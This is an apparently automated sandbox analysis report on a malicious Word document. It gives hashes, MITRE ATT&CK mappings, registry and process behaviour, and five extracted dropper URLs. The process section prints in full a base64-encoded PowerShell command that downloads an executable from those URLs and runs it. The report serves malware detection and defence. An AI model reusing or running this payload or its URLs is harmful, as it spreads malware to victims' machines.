269d5a38bc77f5228031fa16b3b19dea79b6f4095331dc4e6e8edabbd35df36e

General

Target

269d5a38bc77f5228031fa16b3b19dea79b6f4095331dc4e6e8edabbd35df36e.doc
Size

221KB
MD5

8b017e9b07cb81cbe36f0df16c47c404
SHA1

b454db93419c926768b004addc427f77ef6c123d
SHA256

269d5a38bc77f5228031fa16b3b19dea79b6f4095331dc4e6e8edabbd35df36e
SHA512

6f322a42c10d417290ca2bfbe23b9c9610711d04fb1c05b5431e567071878c121e26162278ab3ebe922ab80974b4203d056e1b1b1a4e94c3019133c5e7e2ce77

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://uat-essence.oablab.com/cEP88qz

exe.dropper

http://34.207.179.222/GPc2ykD

exe.dropper

http://204.236.197.55/ZmkN6EP

exe.dropper

http://107.23.200.84/EmllsJND2W

exe.dropper

http://radioviverbem.com.br/SZYTAZDa

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4552	1080	powersheLl.exe	41

Blocklisted process makes network request 7 IoCs

flow	pid	Process
10	4552	powersheLl.exe
17	4552	powersheLl.exe
20	4552	powersheLl.exe
25	4552	powersheLl.exe
27	4552	powersheLl.exe
28	4552	powersheLl.exe
30	4552	powersheLl.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
4252	WINWORD.EXE
4252	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
4552	powersheLl.exe
4552	powersheLl.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4552	powersheLl.exe

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
4252	WINWORD.EXE
4252	WINWORD.EXE
4252	WINWORD.EXE
4252	WINWORD.EXE
4252	WINWORD.EXE
4252	WINWORD.EXE
4252	WINWORD.EXE

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\269d5a38bc77f5228031fa16b3b19dea79b6f4095331dc4e6e8edabbd35df36e.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:4252

C:\Windows\System32\WindowsPowerShell\v1.0\powersheLl.exe
powersheLl -e JABXADcANABfAF8ANQAwAD0AKAAnAG4ANwAyACcAKwAnAF8AMQAnACsAJwA5ACcAKQA7ACQARgBfADQAXwA4ADAAMgA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABHADcAMQAwADEAMwBfAF8APQAoACcAaAAnACsAJwB0AHQAJwArACcAcAA6ACcAKwAnAC8AJwArACcALwAnACsAJwB1AGEAdAAtACcAKwAnAGUAJwArACcAcwBzACcAKwAnAGUAbgAnACsAJwBjAGUALgBvAGEAYgBsAGEAYgAuAGMAbwBtAC8AYwBFAFAAOAA4AHEAegBAAGgAdAAnACsAJwB0AHAAOgAvAC8AMwA0AC4AMgAwACcAKwAnADcALgAxADcAOQAuACcAKwAnADIAMgAnACsAJwAyAC8ARwBQACcAKwAnAGMAJwArACcAMgB5AGsAJwArACcARABAAGgAdAB0ACcAKwAnAHAAOgAvAC8AMgAwADQALgAnACsAJwAyADMANgAuADEAOQAnACsAJwA3AC4ANQA1AC8AWgBtAGsATgA2AEUAUABAAGgAdAB0AHAAOgAvAC8AMQAwADcALgAyADMALgAyADAAMAAuADgANAAvAEUAbQBsAGwAcwBKAE4AJwArACcARAAyAFcAQABoAHQAJwArACcAdABwADoALwAnACsAJwAvAHIAYQBkACcAKwAnAGkAbwB2AGkAdgBlAHIAYgBlAG0ALgAnACsAJwBjAG8AJwArACcAbQAuAGIAcgAvAFMAWgBZAFQAQQBaAEQAYQAnACkALgBTAHAAbABpAHQAKAAnAEAAJwApADsAJABwAF8AOAAwADEANgA9ACgAJwBmACcAKwAnADkAMQA1ADUANgAxACcAKwAnADkAJwApADsAJABBADEAMQAwAF8AOQBfAF8AIAA9ACAAKAAnADEANwAnACsAJwA4ACcAKQA7ACQAaQBfADgANQBfAF8AXwAxAD0AKAAnAEYAMQAxADQAOAAnACsAJwBfACcAKwAnAF8AOAAnACkAOwAkAHMAOQA1ADAAOAAxADEAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEEAMQAxADAAXwA5AF8AXwArACgAJwAuAGUAeAAnACsAJwBlACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAGkAMgBfADIAXwAwADgAIABpAG4AIAAkAEcANwAxADAAMQAzAF8AXwApAHsAdAByAHkAewAkAEYAXwA0AF8AOAAwADIALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAaQAyAF8AMgBfADAAOAAsACAAJABzADkANQAwADgAMQAxACkAOwAkAEQANQBfADMAXwAwAF8APQAoACcAVgA3AF8AXwAwACcAKwAnAF8ANQAnACkAOwBJAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAAJABzADkANQAwADgAMQAxACkALgBsAGUAbgBnAHQAaAAgAC0AZwBlACAANAAwADAAMAAwACkAIAB7AEkAbgB2AG8AawBlAC0ASQB0AGUAbQAgACQAcwA5ADUAMAA4ADEAMQA7ACQAaABfADMANgA3ADEAOAA9ACgAJwBGAF8ANwAxACcAKwAnADIAJwArACcANwBfAF8AJwApADsAYgByAGUAYQBrADsAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFIAOQA0AF8AXwAwADEANwA9ACgAJwBUADQAMwAnACsAJwA5ADgAXwAnACkAOwA=
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4552

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/4252-136-0x00007FFE53840000-0x00007FFE53850000-memory.dmp

Filesize
64KB

Download
memory/4252-142-0x00007FFE56070000-0x00007FFE56080000-memory.dmp

Filesize
64KB

Download
memory/4252-132-0x00007FFE56070000-0x00007FFE56080000-memory.dmp

Filesize
64KB

Download
memory/4252-133-0x00007FFE56070000-0x00007FFE56080000-memory.dmp

Filesize
64KB

Download
memory/4252-134-0x00007FFE56070000-0x00007FFE56080000-memory.dmp

Filesize
64KB

Download
memory/4252-135-0x00007FFE53840000-0x00007FFE53850000-memory.dmp

Filesize
64KB

Download
memory/4252-131-0x00007FFE56070000-0x00007FFE56080000-memory.dmp

Filesize
64KB

Download
memory/4252-145-0x00007FFE56070000-0x00007FFE56080000-memory.dmp

Filesize
64KB

Download
memory/4252-130-0x00007FFE56070000-0x00007FFE56080000-memory.dmp

Filesize
64KB

Download
memory/4252-144-0x00007FFE56070000-0x00007FFE56080000-memory.dmp

Filesize
64KB

Download
memory/4252-143-0x00007FFE56070000-0x00007FFE56080000-memory.dmp

Filesize
64KB

Download
memory/4552-138-0x00007FFE6B260000-0x00007FFE6BD21000-memory.dmp

Filesize
10.8MB

Download
memory/4552-140-0x00007FFE6B260000-0x00007FFE6BD21000-memory.dmp

Filesize
10.8MB

Download
memory/4552-139-0x00007FFE6B260000-0x00007FFE6BD21000-memory.dmp

Filesize
10.8MB

Download
memory/4552-137-0x0000023506E10000-0x0000023506E32000-memory.dmp

Filesize
136KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads